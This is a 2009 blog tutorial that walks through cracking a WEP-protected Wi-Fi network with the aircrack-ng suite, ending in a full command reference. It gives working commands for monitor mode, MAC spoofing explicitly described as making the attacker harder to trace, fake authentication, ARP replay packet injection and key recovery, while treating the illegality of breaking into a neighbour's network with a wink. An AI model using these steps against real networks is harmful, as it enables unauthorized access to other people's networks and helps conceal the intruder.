How to crack WEP

Posted on August 31, 2009 Danny

No Comment BOOKMARK

This article explains how to crack WEP. Of course, it’s illegal to crack your neighbour’s network key without their permission, but this is for the… penetration testers among us. ^_-

Prerequisites:

A compatible wireless card – you need a card capable of injecting packets.
Patience! This process can be sped up with a good signal, but speeding it all up can sometimes fail. If it’s slow, it can take a few days, but we can do it in ~15 minutes with the right kit.
This tutorial covers cracking WEP from a Linux distro. I recommend using BackTrack, since it has all the tools that you’ll need. If you’re going to be using a different distro, you’re going to need to download the aircrack-ng suite, and I also recommend downloading macchanger

If you’re downloading aircrack-ng yourself, open up a terminal and type:

sudo apt-get install aircrack-ng macchanger

Once you have these tools, we’re ready to rock! Let’s get started.

First off, start by typing su into the terminal. While not necessary, since you can use sudo on each command, it’ll save you typing a little in each command. :-)

Step 1: Finding your wireless interface
The first thing we need to do is find the name of your wireless interface. For me, it’s wlan0, but it can vary. For example, yours might be ath0. We can find the name by simply typing iwconfig into the terminal. From here on in, wherever you see (interface), replace it with your interface name.

Step 2: Putting your wireless interface into monitor mode
To put your wireless card into monitor mode, you first need to stop it. While we’re at it, let’s spoof our MAC address. (This makes commands easier to type since you don’t need to remember your MAC address, and also harder to trace) Lastly, we’ll start airmon-ng on it. We do this using the following commands:

airmon-ng stop (interface)

ifconfig (interface) down

iwconfig (interface) mode monitor

macchanger -m 00:11:22:33:44:55 (interface)

airmon-ng start (interface)

Would you believe that that’s half the commands done already? :-) The process itself is rather simple thanks to aircrack.

Step 3: Finding the access point you wish to crack
So now that we’re in monitor mode, we need to find the network we want to crack. To do this, type airodump-ng (interface) into your terminal. You should see a list with lots of numbers and stuff appearing. Note down the BSSID, and the Channel. We’ll be needing these to help aircrack identify the network. You should be able to identify the AP you want to crack by the ESSID, and hopefully a good PWR rate of around -30. From here on in, replace (bssid) with the BSSID of the network, and (channel) with the channel of the network in each command. Once you’re ready, hit Ctrl+C to close airodump. We’re now going to run airodump again, specifically to monitor this AP to capture the information we need.

airodump-ng --bssid (bssid) -c (channel) --ivs -w dumpfile

Step 4: Speeding it all up
The information that we’re capturing is under the #Data column. Notice how slowly it comes in? The average for me, though it varies, is around 2 per minute. Since we need at least 10,000 to crack a WEP key successfully, it could take some time. To speed things up a bit, we’re going to fake auth on the network, and then attack directly. We can do this in two steps. First off, open up a new terminal. We need to leave airodump-ng running in this terminal until we have enough #Data to crack the key. In your new terminal session, run the following command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interface)

This is to fake auth with the network. There are many methods of speeding this up, but this is my favourite, since it doesn’t require any other users to be on the network when you’re cracking it. If successful, you should see that reassuring smiley face :-)

Provided that you succeeded in fake authing with the network, we can proceed with the attack.

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

After a few moments, you should see the #Data column start to increase fairly quickly.

Step 5: Cracking the key
Lastly, once you have around 10,000 #Data in airodump, open up a third terminal, and type the following:

aircrack-ng --bssid (bssid) dumpfile-01.cap

You’ll see it trying thousands of keys on the network, until it finds one. If it fails, simply leave it running and it will try again once airodump picks up another 5,000 #Data.

When you finally see aircrack-ng say Success! Key: 00:00:00:00:00:00:00:00, make a note of the key and close all the windows. You can enter this key into the connect screen directly, without the colons, and you’ll be on the network.

Apologies if I haven’t been too clear – it’s been a while since I blogged. :-) If you have any problems, please leave a comment and I’ll do my best to help you.

Also, remember this is illegal if you don’t have permission. Though I can’t stop you. ^_-

In summary, here’s a reference of all the commands that you’ll need:

# apt-get install macchanger aircrack-ng

# find interface in iwconfig

# stop the interface
airmon-ng stop (interface)
ifconfig (interface) down

# put the interface into monitor mode
iwconfig (interface) mode monitor

# spoof the mac
macchanger -m 00:11:22:33:44:55 (interface)

# start monitoring
airmon-ng start (interface)

# find the bssid and channel with airodump-ng (interface)

# start monitoring the AP and dump #data to file (dumpfile)
airodump-ng (interface) –bssid (bssid) -c (channel) -w (dumpfile)

# associate with the AP – make it spew out lots of #data :-)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

# crack the IVs aircrack-ng -b (bssid) (dumpfile-01.cap)

Popularity: 100% [?]

Share this Post: